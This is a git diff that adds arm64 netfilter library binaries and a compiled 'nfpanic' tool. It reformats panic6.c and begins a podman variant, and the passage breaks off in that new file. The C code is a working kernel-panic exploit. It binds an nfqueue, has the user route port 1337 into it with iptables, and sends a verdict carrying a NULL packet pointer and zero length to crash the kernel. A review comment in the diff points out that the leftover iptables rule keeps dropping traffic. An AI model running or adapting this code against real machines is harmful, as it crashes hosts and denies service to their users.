diff --git a/arm64/libnetfilter_queue.so.1 b/arm64/libnetfilter_queue.so.1 new file mode 100644 index 0000000..d5fd367 Binary files /dev/null and b/arm64/libnetfilter_queue.so.1 differ diff --git a/arm64/libnfnetlink.so.0 b/arm64/libnfnetlink.so.0 new file mode 100644 index 0000000..9acc567 Binary files /dev/null and b/arm64/libnfnetlink.so.0 differ diff --git a/arm64/libnftnl.so.11 b/arm64/libnftnl.so.11 new file mode 100644 index 0000000..f2949ba Binary files /dev/null and b/arm64/libnftnl.so.11 differ diff --git a/arm64/libxtables.so.12 b/arm64/libxtables.so.12 new file mode 100644 index 0000000..d1ed04d Binary files /dev/null and b/arm64/libxtables.so.12 differ diff --git a/arm64/libz.so.1 b/arm64/libz.so.1 new file mode 100644 index 0000000..6e09321 Binary files /dev/null and b/arm64/libz.so.1 differ diff --git a/arm64/nfpanic b/arm64/nfpanic new file mode 100755 index 0000000..9d7c046 Binary files /dev/null and b/arm64/nfpanic differ diff --git a/arm64/xtables/libarpt_mangle.so b/arm64/xtables/libarpt_mangle.so new file mode 100644 index 0000000..86447fa Binary files /dev/null and b/arm64/xtables/libarpt_mangle.so differ diff --git a/arm64/xtables/libebt_802_3.so b/arm64/xtables/libebt_802_3.so new file mode 100644 index 0000000..cf35442 Binary files /dev/null and b/arm64/xtables/libebt_802_3.so differ diff --git a/arm64/xtables/libebt_among.so b/arm64/xtables/libebt_among.so new file mode 100644 index 0000000..93e4000 Binary files /dev/null and b/arm64/xtables/libebt_among.so differ diff --git a/arm64/xtables/libebt_arp.so b/arm64/xtables/libebt_arp.so new file mode 100644 index 0000000..30afd38 Binary files /dev/null and b/arm64/xtables/libebt_arp.so differ diff --git a/arm64/xtables/libebt_arpreply.so b/arm64/xtables/libebt_arpreply.so new file mode 100644 index 0000000..8f8b5db Binary files /dev/null and b/arm64/xtables/libebt_arpreply.so differ 
diff --git a/arm64/xtables/libebt_dnat.so b/arm64/xtables/libebt_dnat.so new file mode 100644 index 0000000..f9a86b4 Binary files /dev/null and b/arm64/xtables/libebt_dnat.so differ diff --git a/arm64/xtables/libebt_ip.so b/arm64/xtables/libebt_ip.so new file mode 100644 index 0000000..6a8adbd Binary files /dev/null and b/arm64/xtables/libebt_ip.so differ diff --git a/arm64/xtables/libebt_ip6.so b/arm64/xtables/libebt_ip6.so new file mode 100644 index 0000000..be1b490 Binary files /dev/null and b/arm64/xtables/libebt_ip6.so differ diff --git a/arm64/xtables/libebt_log.so b/arm64/xtables/libebt_log.so new file mode 100644 index 0000000..a3affc4 Binary files /dev/null and b/arm64/xtables/libebt_log.so differ diff --git a/arm64/xtables/libebt_mark.so b/arm64/xtables/libebt_mark.so new file mode 100644 index 0000000..e2fb474 Binary files /dev/null and b/arm64/xtables/libebt_mark.so differ diff --git a/arm64/xtables/libebt_mark_m.so b/arm64/xtables/libebt_mark_m.so new file mode 100644 index 0000000..d522ac3 Binary files /dev/null and b/arm64/xtables/libebt_mark_m.so differ diff --git a/arm64/xtables/libebt_nflog.so b/arm64/xtables/libebt_nflog.so new file mode 100644 index 0000000..1e0c319 Binary files /dev/null and b/arm64/xtables/libebt_nflog.so differ diff --git a/arm64/xtables/libebt_pkttype.so b/arm64/xtables/libebt_pkttype.so new file mode 100644 index 0000000..d48f355 Binary files /dev/null and b/arm64/xtables/libebt_pkttype.so differ diff --git a/arm64/xtables/libebt_redirect.so b/arm64/xtables/libebt_redirect.so new file mode 100644 index 0000000..88c6834 Binary files /dev/null and b/arm64/xtables/libebt_redirect.so differ diff --git a/arm64/xtables/libebt_snat.so b/arm64/xtables/libebt_snat.so new file mode 100644 index 0000000..d8b44f7 Binary files /dev/null and b/arm64/xtables/libebt_snat.so differ 
diff --git a/arm64/xtables/libebt_stp.so b/arm64/xtables/libebt_stp.so new file mode 100644 index 0000000..417a1fc Binary files /dev/null and b/arm64/xtables/libebt_stp.so differ diff --git a/arm64/xtables/libebt_vlan.so b/arm64/xtables/libebt_vlan.so new file mode 100644 index 0000000..89d3e93 Binary files /dev/null and b/arm64/xtables/libebt_vlan.so differ diff --git a/arm64/xtables/libip6t_DNPT.so b/arm64/xtables/libip6t_DNPT.so new file mode 100644 index 0000000..ce72226 Binary files /dev/null and b/arm64/xtables/libip6t_DNPT.so differ diff --git a/arm64/xtables/libip6t_HL.so b/arm64/xtables/libip6t_HL.so new file mode 100644 index 0000000..e81a3b0 Binary files /dev/null and b/arm64/xtables/libip6t_HL.so differ diff --git a/arm64/xtables/libip6t_NETMAP.so b/arm64/xtables/libip6t_NETMAP.so new file mode 100644 index 0000000..14183f1 Binary files /dev/null and b/arm64/xtables/libip6t_NETMAP.so differ diff --git a/arm64/xtables/libip6t_REJECT.so b/arm64/xtables/libip6t_REJECT.so new file mode 100644 index 0000000..547c728 Binary files /dev/null and b/arm64/xtables/libip6t_REJECT.so differ diff --git a/arm64/xtables/libip6t_SNPT.so b/arm64/xtables/libip6t_SNPT.so new file mode 100644 index 0000000..025c7f1 Binary files /dev/null and b/arm64/xtables/libip6t_SNPT.so differ diff --git a/arm64/xtables/libip6t_ah.so b/arm64/xtables/libip6t_ah.so new file mode 100644 index 0000000..66dd5eb Binary files /dev/null and b/arm64/xtables/libip6t_ah.so differ diff --git a/arm64/xtables/libip6t_dst.so b/arm64/xtables/libip6t_dst.so new file mode 100644 index 0000000..0cd71ee Binary files /dev/null and b/arm64/xtables/libip6t_dst.so differ diff --git a/arm64/xtables/libip6t_eui64.so b/arm64/xtables/libip6t_eui64.so new file mode 100644 index 0000000..9e9d8ef Binary files /dev/null and b/arm64/xtables/libip6t_eui64.so differ 
diff --git a/arm64/xtables/libip6t_frag.so b/arm64/xtables/libip6t_frag.so new file mode 100644 index 0000000..7d1ff50 Binary files /dev/null and b/arm64/xtables/libip6t_frag.so differ diff --git a/arm64/xtables/libip6t_hbh.so b/arm64/xtables/libip6t_hbh.so new file mode 100644 index 0000000..405667d Binary files /dev/null and b/arm64/xtables/libip6t_hbh.so differ diff --git a/arm64/xtables/libip6t_icmp6.so b/arm64/xtables/libip6t_icmp6.so new file mode 100644 index 0000000..79f5315 Binary files /dev/null and b/arm64/xtables/libip6t_icmp6.so differ diff --git a/arm64/xtables/libip6t_ipv6header.so b/arm64/xtables/libip6t_ipv6header.so new file mode 100644 index 0000000..0ae764b Binary files /dev/null and b/arm64/xtables/libip6t_ipv6header.so differ diff --git a/arm64/xtables/libip6t_mh.so b/arm64/xtables/libip6t_mh.so new file mode 100644 index 0000000..84d7a0a Binary files /dev/null and b/arm64/xtables/libip6t_mh.so differ diff --git a/arm64/xtables/libip6t_rt.so b/arm64/xtables/libip6t_rt.so new file mode 100644 index 0000000..7a7b152 Binary files /dev/null and b/arm64/xtables/libip6t_rt.so differ diff --git a/arm64/xtables/libip6t_srh.so b/arm64/xtables/libip6t_srh.so new file mode 100644 index 0000000..736a6ea Binary files /dev/null and b/arm64/xtables/libip6t_srh.so differ diff --git a/arm64/xtables/libipt_CLUSTERIP.so b/arm64/xtables/libipt_CLUSTERIP.so new file mode 100644 index 0000000..c9509f6 Binary files /dev/null and b/arm64/xtables/libipt_CLUSTERIP.so differ diff --git a/arm64/xtables/libipt_ECN.so b/arm64/xtables/libipt_ECN.so new file mode 100644 index 0000000..197cb99 Binary files /dev/null and b/arm64/xtables/libipt_ECN.so differ diff --git a/arm64/xtables/libipt_NETMAP.so b/arm64/xtables/libipt_NETMAP.so new file mode 100644 index 0000000..7499d79 Binary files /dev/null and b/arm64/xtables/libipt_NETMAP.so differ 
diff --git a/arm64/xtables/libipt_REJECT.so b/arm64/xtables/libipt_REJECT.so new file mode 100644 index 0000000..e078ef1 Binary files /dev/null and b/arm64/xtables/libipt_REJECT.so differ diff --git a/arm64/xtables/libipt_TTL.so b/arm64/xtables/libipt_TTL.so new file mode 100644 index 0000000..998abe4 Binary files /dev/null and b/arm64/xtables/libipt_TTL.so differ diff --git a/arm64/xtables/libipt_ULOG.so b/arm64/xtables/libipt_ULOG.so new file mode 100644 index 0000000..4449a6d Binary files /dev/null and b/arm64/xtables/libipt_ULOG.so differ diff --git a/arm64/xtables/libipt_ah.so b/arm64/xtables/libipt_ah.so new file mode 100644 index 0000000..02f6200 Binary files /dev/null and b/arm64/xtables/libipt_ah.so differ diff --git a/arm64/xtables/libipt_icmp.so b/arm64/xtables/libipt_icmp.so new file mode 100644 index 0000000..1d844f5 Binary files /dev/null and b/arm64/xtables/libipt_icmp.so differ diff --git a/arm64/xtables/libipt_realm.so b/arm64/xtables/libipt_realm.so new file mode 100644 index 0000000..83a2ba1 Binary files /dev/null and b/arm64/xtables/libipt_realm.so differ diff --git a/arm64/xtables/libxt_AUDIT.so b/arm64/xtables/libxt_AUDIT.so new file mode 100644 index 0000000..a77210d Binary files /dev/null and b/arm64/xtables/libxt_AUDIT.so differ diff --git a/arm64/xtables/libxt_CHECKSUM.so b/arm64/xtables/libxt_CHECKSUM.so new file mode 100644 index 0000000..b7b9526 Binary files /dev/null and b/arm64/xtables/libxt_CHECKSUM.so differ diff --git a/arm64/xtables/libxt_CLASSIFY.so b/arm64/xtables/libxt_CLASSIFY.so new file mode 100644 index 0000000..93b14d7 Binary files /dev/null and b/arm64/xtables/libxt_CLASSIFY.so differ diff --git a/arm64/xtables/libxt_CONNMARK.so b/arm64/xtables/libxt_CONNMARK.so new file mode 100644 index 0000000..b468c17 Binary files /dev/null and b/arm64/xtables/libxt_CONNMARK.so differ 
diff --git a/arm64/xtables/libxt_CONNSECMARK.so b/arm64/xtables/libxt_CONNSECMARK.so new file mode 100644 index 0000000..179d3d4 Binary files /dev/null and b/arm64/xtables/libxt_CONNSECMARK.so differ diff --git a/arm64/xtables/libxt_CT.so b/arm64/xtables/libxt_CT.so new file mode 100644 index 0000000..c8cfa6c Binary files /dev/null and b/arm64/xtables/libxt_CT.so differ diff --git a/arm64/xtables/libxt_DNAT.so b/arm64/xtables/libxt_DNAT.so new file mode 120000 index 0000000..b558f83 --- /dev/null +++ b/arm64/xtables/libxt_DNAT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/arm64/xtables/libxt_DSCP.so b/arm64/xtables/libxt_DSCP.so new file mode 100644 index 0000000..efc8b06 Binary files /dev/null and b/arm64/xtables/libxt_DSCP.so differ diff --git a/arm64/xtables/libxt_HMARK.so b/arm64/xtables/libxt_HMARK.so new file mode 100644 index 0000000..0447ea3 Binary files /dev/null and b/arm64/xtables/libxt_HMARK.so differ diff --git a/arm64/xtables/libxt_IDLETIMER.so b/arm64/xtables/libxt_IDLETIMER.so new file mode 100644 index 0000000..f2487f9 Binary files /dev/null and b/arm64/xtables/libxt_IDLETIMER.so differ diff --git a/arm64/xtables/libxt_LED.so b/arm64/xtables/libxt_LED.so new file mode 100644 index 0000000..7d1469c Binary files /dev/null and b/arm64/xtables/libxt_LED.so differ diff --git a/arm64/xtables/libxt_LOG.so b/arm64/xtables/libxt_LOG.so new file mode 100644 index 0000000..b5eb85d Binary files /dev/null and b/arm64/xtables/libxt_LOG.so differ diff --git a/arm64/xtables/libxt_MARK.so b/arm64/xtables/libxt_MARK.so new file mode 100644 index 0000000..92836e5 Binary files /dev/null and b/arm64/xtables/libxt_MARK.so differ diff --git a/arm64/xtables/libxt_MASQUERADE.so b/arm64/xtables/libxt_MASQUERADE.so new file mode 120000 index 0000000..b558f83 --- /dev/null +++ b/arm64/xtables/libxt_MASQUERADE.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file 
diff --git a/arm64/xtables/libxt_NAT.so b/arm64/xtables/libxt_NAT.so new file mode 100644 index 0000000..9da7f03 Binary files /dev/null and b/arm64/xtables/libxt_NAT.so differ diff --git a/arm64/xtables/libxt_NFLOG.so b/arm64/xtables/libxt_NFLOG.so new file mode 100644 index 0000000..784b076 Binary files /dev/null and b/arm64/xtables/libxt_NFLOG.so differ diff --git a/arm64/xtables/libxt_NFQUEUE.so b/arm64/xtables/libxt_NFQUEUE.so new file mode 100644 index 0000000..b058de5 Binary files /dev/null and b/arm64/xtables/libxt_NFQUEUE.so differ diff --git a/arm64/xtables/libxt_NOTRACK.so b/arm64/xtables/libxt_NOTRACK.so new file mode 120000 index 0000000..e97684d --- /dev/null +++ b/arm64/xtables/libxt_NOTRACK.so @@ -0,0 +1 @@ +libxt_CT.so \ No newline at end of file diff --git a/arm64/xtables/libxt_RATEEST.so b/arm64/xtables/libxt_RATEEST.so new file mode 100644 index 0000000..2772103 Binary files /dev/null and b/arm64/xtables/libxt_RATEEST.so differ diff --git a/arm64/xtables/libxt_REDIRECT.so b/arm64/xtables/libxt_REDIRECT.so new file mode 120000 index 0000000..b558f83 --- /dev/null +++ b/arm64/xtables/libxt_REDIRECT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/arm64/xtables/libxt_SECMARK.so b/arm64/xtables/libxt_SECMARK.so new file mode 100644 index 0000000..18fb81d Binary files /dev/null and b/arm64/xtables/libxt_SECMARK.so differ diff --git a/arm64/xtables/libxt_SET.so b/arm64/xtables/libxt_SET.so new file mode 100644 index 0000000..347b88d Binary files /dev/null and b/arm64/xtables/libxt_SET.so differ diff --git a/arm64/xtables/libxt_SNAT.so b/arm64/xtables/libxt_SNAT.so new file mode 120000 index 0000000..b558f83 --- /dev/null +++ b/arm64/xtables/libxt_SNAT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/arm64/xtables/libxt_SYNPROXY.so b/arm64/xtables/libxt_SYNPROXY.so new file mode 100644 index 0000000..bd6d396 Binary files /dev/null and b/arm64/xtables/libxt_SYNPROXY.so differ 
diff --git a/arm64/xtables/libxt_TCPMSS.so b/arm64/xtables/libxt_TCPMSS.so new file mode 100644 index 0000000..8a5f177 Binary files /dev/null and b/arm64/xtables/libxt_TCPMSS.so differ diff --git a/arm64/xtables/libxt_TCPOPTSTRIP.so b/arm64/xtables/libxt_TCPOPTSTRIP.so new file mode 100644 index 0000000..bd04f64 Binary files /dev/null and b/arm64/xtables/libxt_TCPOPTSTRIP.so differ diff --git a/arm64/xtables/libxt_TEE.so b/arm64/xtables/libxt_TEE.so new file mode 100644 index 0000000..b1c9424 Binary files /dev/null and b/arm64/xtables/libxt_TEE.so differ diff --git a/arm64/xtables/libxt_TOS.so b/arm64/xtables/libxt_TOS.so new file mode 100644 index 0000000..f796ccf Binary files /dev/null and b/arm64/xtables/libxt_TOS.so differ diff --git a/arm64/xtables/libxt_TPROXY.so b/arm64/xtables/libxt_TPROXY.so new file mode 100644 index 0000000..a1da71b Binary files /dev/null and b/arm64/xtables/libxt_TPROXY.so differ diff --git a/arm64/xtables/libxt_TRACE.so b/arm64/xtables/libxt_TRACE.so new file mode 100644 index 0000000..a006a65 Binary files /dev/null and b/arm64/xtables/libxt_TRACE.so differ diff --git a/arm64/xtables/libxt_addrtype.so b/arm64/xtables/libxt_addrtype.so new file mode 100644 index 0000000..5b414e7 Binary files /dev/null and b/arm64/xtables/libxt_addrtype.so differ diff --git a/arm64/xtables/libxt_bpf.so b/arm64/xtables/libxt_bpf.so new file mode 100644 index 0000000..733005a Binary files /dev/null and b/arm64/xtables/libxt_bpf.so differ diff --git a/arm64/xtables/libxt_cgroup.so b/arm64/xtables/libxt_cgroup.so new file mode 100644 index 0000000..2a58986 Binary files /dev/null and b/arm64/xtables/libxt_cgroup.so differ diff --git a/arm64/xtables/libxt_cluster.so b/arm64/xtables/libxt_cluster.so new file mode 100644 index 0000000..a690ccb Binary files /dev/null and b/arm64/xtables/libxt_cluster.so differ 
diff --git a/arm64/xtables/libxt_comment.so b/arm64/xtables/libxt_comment.so new file mode 100644 index 0000000..ae86006 Binary files /dev/null and b/arm64/xtables/libxt_comment.so differ diff --git a/arm64/xtables/libxt_connbytes.so b/arm64/xtables/libxt_connbytes.so new file mode 100644 index 0000000..2b67b13 Binary files /dev/null and b/arm64/xtables/libxt_connbytes.so differ diff --git a/arm64/xtables/libxt_connlabel.so b/arm64/xtables/libxt_connlabel.so new file mode 100644 index 0000000..47c5682 Binary files /dev/null and b/arm64/xtables/libxt_connlabel.so differ diff --git a/arm64/xtables/libxt_connlimit.so b/arm64/xtables/libxt_connlimit.so new file mode 100644 index 0000000..ffb2df3 Binary files /dev/null and b/arm64/xtables/libxt_connlimit.so differ diff --git a/arm64/xtables/libxt_conntrack.so b/arm64/xtables/libxt_conntrack.so new file mode 100644 index 0000000..9249c3b Binary files /dev/null and b/arm64/xtables/libxt_conntrack.so differ diff --git a/arm64/xtables/libxt_cpu.so b/arm64/xtables/libxt_cpu.so new file mode 100644 index 0000000..55762f3 Binary files /dev/null and b/arm64/xtables/libxt_cpu.so differ diff --git a/arm64/xtables/libxt_dccp.so b/arm64/xtables/libxt_dccp.so new file mode 100644 index 0000000..dfdf79a Binary files /dev/null and b/arm64/xtables/libxt_dccp.so differ diff --git a/arm64/xtables/libxt_devgroup.so b/arm64/xtables/libxt_devgroup.so new file mode 100644 index 0000000..9430293 Binary files /dev/null and b/arm64/xtables/libxt_devgroup.so differ diff --git a/arm64/xtables/libxt_ecn.so b/arm64/xtables/libxt_ecn.so new file mode 100644 index 0000000..75a2447 Binary files /dev/null and b/arm64/xtables/libxt_ecn.so differ diff --git a/arm64/xtables/libxt_esp.so b/arm64/xtables/libxt_esp.so new file mode 100644 index 0000000..5912d2f Binary files /dev/null and b/arm64/xtables/libxt_esp.so differ 
diff --git a/arm64/xtables/libxt_hashlimit.so b/arm64/xtables/libxt_hashlimit.so new file mode 100644 index 0000000..f2231aa Binary files /dev/null and b/arm64/xtables/libxt_hashlimit.so differ diff --git a/arm64/xtables/libxt_helper.so b/arm64/xtables/libxt_helper.so new file mode 100644 index 0000000..2c66715 Binary files /dev/null and b/arm64/xtables/libxt_helper.so differ diff --git a/arm64/xtables/libxt_ipcomp.so b/arm64/xtables/libxt_ipcomp.so new file mode 100644 index 0000000..e0e98fd Binary files /dev/null and b/arm64/xtables/libxt_ipcomp.so differ diff --git a/arm64/xtables/libxt_iprange.so b/arm64/xtables/libxt_iprange.so new file mode 100644 index 0000000..f38e98d Binary files /dev/null and b/arm64/xtables/libxt_iprange.so differ diff --git a/arm64/xtables/libxt_ipvs.so b/arm64/xtables/libxt_ipvs.so new file mode 100644 index 0000000..354cff6 Binary files /dev/null and b/arm64/xtables/libxt_ipvs.so differ diff --git a/arm64/xtables/libxt_length.so b/arm64/xtables/libxt_length.so new file mode 100644 index 0000000..9b58093 Binary files /dev/null and b/arm64/xtables/libxt_length.so differ diff --git a/arm64/xtables/libxt_limit.so b/arm64/xtables/libxt_limit.so new file mode 100644 index 0000000..e7eb460 Binary files /dev/null and b/arm64/xtables/libxt_limit.so differ diff --git a/arm64/xtables/libxt_mac.so b/arm64/xtables/libxt_mac.so new file mode 100644 index 0000000..1bdf46b Binary files /dev/null and b/arm64/xtables/libxt_mac.so differ diff --git a/arm64/xtables/libxt_multiport.so b/arm64/xtables/libxt_multiport.so new file mode 100644 index 0000000..362f28d Binary files /dev/null and b/arm64/xtables/libxt_multiport.so differ diff --git a/arm64/xtables/libxt_nfacct.so b/arm64/xtables/libxt_nfacct.so new file mode 100644 index 0000000..4fb9ff0 Binary files /dev/null and b/arm64/xtables/libxt_nfacct.so differ 
diff --git a/arm64/xtables/libxt_osf.so b/arm64/xtables/libxt_osf.so new file mode 100644 index 0000000..24d1b47 Binary files /dev/null and b/arm64/xtables/libxt_osf.so differ diff --git a/arm64/xtables/libxt_owner.so b/arm64/xtables/libxt_owner.so new file mode 100644 index 0000000..77c2ff8 Binary files /dev/null and b/arm64/xtables/libxt_owner.so differ diff --git a/arm64/xtables/libxt_physdev.so b/arm64/xtables/libxt_physdev.so new file mode 100644 index 0000000..c253784 Binary files /dev/null and b/arm64/xtables/libxt_physdev.so differ diff --git a/arm64/xtables/libxt_pkttype.so b/arm64/xtables/libxt_pkttype.so new file mode 100644 index 0000000..3ef5a4b Binary files /dev/null and b/arm64/xtables/libxt_pkttype.so differ diff --git a/arm64/xtables/libxt_policy.so b/arm64/xtables/libxt_policy.so new file mode 100644 index 0000000..e911bc6 Binary files /dev/null and b/arm64/xtables/libxt_policy.so differ diff --git a/arm64/xtables/libxt_quota.so b/arm64/xtables/libxt_quota.so new file mode 100644 index 0000000..eeb5fd0 Binary files /dev/null and b/arm64/xtables/libxt_quota.so differ diff --git a/arm64/xtables/libxt_recent.so b/arm64/xtables/libxt_recent.so new file mode 100644 index 0000000..03cf58e Binary files /dev/null and b/arm64/xtables/libxt_recent.so differ diff --git a/arm64/xtables/libxt_rpfilter.so b/arm64/xtables/libxt_rpfilter.so new file mode 100644 index 0000000..769a30d Binary files /dev/null and b/arm64/xtables/libxt_rpfilter.so differ diff --git a/arm64/xtables/libxt_sctp.so b/arm64/xtables/libxt_sctp.so new file mode 100644 index 0000000..8cc6d3b Binary files /dev/null and b/arm64/xtables/libxt_sctp.so differ diff --git a/arm64/xtables/libxt_socket.so b/arm64/xtables/libxt_socket.so new file mode 100644 index 0000000..d1e5276 Binary files /dev/null and b/arm64/xtables/libxt_socket.so differ 
diff --git a/arm64/xtables/libxt_standard.so b/arm64/xtables/libxt_standard.so new file mode 100644 index 0000000..47d0d3d Binary files /dev/null and b/arm64/xtables/libxt_standard.so differ diff --git a/arm64/xtables/libxt_state.so b/arm64/xtables/libxt_state.so new file mode 120000 index 0000000..24417c2 --- /dev/null +++ b/arm64/xtables/libxt_state.so @@ -0,0 +1 @@ +libxt_conntrack.so \ No newline at end of file diff --git a/arm64/xtables/libxt_statistic.so b/arm64/xtables/libxt_statistic.so new file mode 100644 index 0000000..52d9e96 Binary files /dev/null and b/arm64/xtables/libxt_statistic.so differ diff --git a/arm64/xtables/libxt_string.so b/arm64/xtables/libxt_string.so new file mode 100644 index 0000000..9930f6e Binary files /dev/null and b/arm64/xtables/libxt_string.so differ diff --git a/arm64/xtables/libxt_tcp.so b/arm64/xtables/libxt_tcp.so new file mode 100644 index 0000000..e620ef7 Binary files /dev/null and b/arm64/xtables/libxt_tcp.so differ diff --git a/arm64/xtables/libxt_time.so b/arm64/xtables/libxt_time.so new file mode 100644 index 0000000..201719c Binary files /dev/null and b/arm64/xtables/libxt_time.so differ diff --git a/arm64/xtables/libxt_u32.so b/arm64/xtables/libxt_u32.so new file mode 100644 index 0000000..e3dd82c Binary files /dev/null and b/arm64/xtables/libxt_u32.so differ diff --git a/arm64/xtables/libxt_udp.so b/arm64/xtables/libxt_udp.so new file mode 100644 index 0000000..9c98f93 Binary files /dev/null and b/arm64/xtables/libxt_udp.so differ diff --git a/panic6.c b/panic6.c index 754d840..3322cfe 100644 --- a/panic6.c +++ b/panic6.c 
@@ -10,55 +10,60 @@ #include #include -//How to compile: -//cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic +// How to compile: +// cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic int socket_conn(uint16_t port) { - int sockfd, connfd; - struct sockaddr_in servaddr, cli; - - // socket create and verification - sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); - if (sockfd == -1) { - perror("socket creation failed"); - exit(EXIT_FAILURE); - } - bzero(&servaddr, sizeof(servaddr)); - - // assign IP, PORT - servaddr.sin_family = AF_INET; - servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); - servaddr.sin_port = htons(port); - - // connect the client socket to server socket - connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) + { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); + return sockfd; } int main(int argc, char *argv[]) { - size_t BUF_SIZE = 0xffff+(MNL_SOCKET_BUFFER_SIZE/2); + size_t BUF_SIZE = 0xffff + (MNL_SOCKET_BUFFER_SIZE / 2); char buf[BUF_SIZE]; uint16_t queue_num = 1337; struct nlmsghdr *nlh; puts("[*] Creating the socket with the kernel"); - struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); - if (nl == NULL) { - perror( "mnl_socket_open" ); + struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) + { + perror("mnl_socket_open"); exit(EXIT_FAILURE); } puts("[*] Binding the socket"); - if (mnl_socket_bind(nl, 0, 
MNL_SOCKET_AUTOPID) < 0) { - perror( "mnl_socket_bind" ); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) + { + perror("mnl_socket_bind"); exit(EXIT_FAILURE); } - printf("[*] Sending the BIND command for the nfqueue %d\n",queue_num); + printf("[*] Sending the BIND command for the nfqueue %d\n", queue_num); nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); exit(EXIT_FAILURE); } @@ -67,11 +72,12 @@ int main(int argc, char *argv[]) nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); exit(EXIT_FAILURE); } - + printf("[*] You need to associate to this queue the port 1337: sudo iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); puts("Press ENTER to contiune (and panic)"); getchar(); 
@@ -79,26 +85,25 @@ int main(int argc, char *argv[]) puts("[*] Sending a connection packet to nfqueue"); socket_conn(1337); - puts("[*] Waiting for a packet in the nfqueue"); - if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) { - perror( "mnl_socket_recvfrom" ); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) + { + perror("mnl_socket_recvfrom"); exit(EXIT_FAILURE); } - puts("[*] Sending the verdict with a NULL pointer and len = 0"); + puts("[*] Setting the verdict with a NULL pointer and len = 0"); nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); - nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT ); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT); puts("[*] Sending the verdict to the kernel, Good panic :D"); - sleep(1); //Only to see the print - if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { - perror( "mnl_socket_send" ); + sleep(1); // Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); exit(EXIT_FAILURE); } - puts("[*] Are you still alive?"); - + puts("[*] Are you still alive? Probably your kernel is not vulnerable :("); + return EXIT_SUCCESS; } - - diff --git a/panic6_podman.c b/panic6_podman.c new file mode 100644 index 0000000..642ef99 --- /dev/null +++ b/panic6_podman.c 
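Review bot: When the last `mnl_socket_sendto` returns and main prints the "not vulnerable" message at the end of this hunk, the program exits while the NFQUEUE rule the user was told to add with sudo (the printf before `getchar()`) is still in the mangle table. Once the process is gone nothing listens on queue 1337, and an NFQUEUE rule without a listener and without `--queue-bypass` drops matching packets, so TCP traffic to port 1337 on the test machine stays broken until the rule is removed. I would print the removal command before `return EXIT_SUCCESS;`, for example `puts("[*] Clean up with: sudo iptables -t mangle -D PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num 1337");`. main's body starts outside this hunk.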
@@ -0,0 +1,115 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// How to compile: +// cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic + +int socket_conn(uint16_t port) +{ + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) + { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); + return sockfd; +} + +int main(int argc, char *argv[]) +{ + size_t BUF_SIZE = 0xffff + (MNL_SOCKET_BUFFER_SIZE / 2); + char buf[BUF_SIZE]; + uint16_t queue_num = 1337; + struct nlmsghdr *nlh; + + puts("[*] Creating the socket with the kernel"); + struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) + { + perror("mnl_socket_open"); + exit(EXIT_FAILURE); + } + puts("[*] Binding the socket"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) + { + perror("mnl_socket_bind"); + exit(EXIT_FAILURE); + } + + printf("[*] Sending the BIND command for 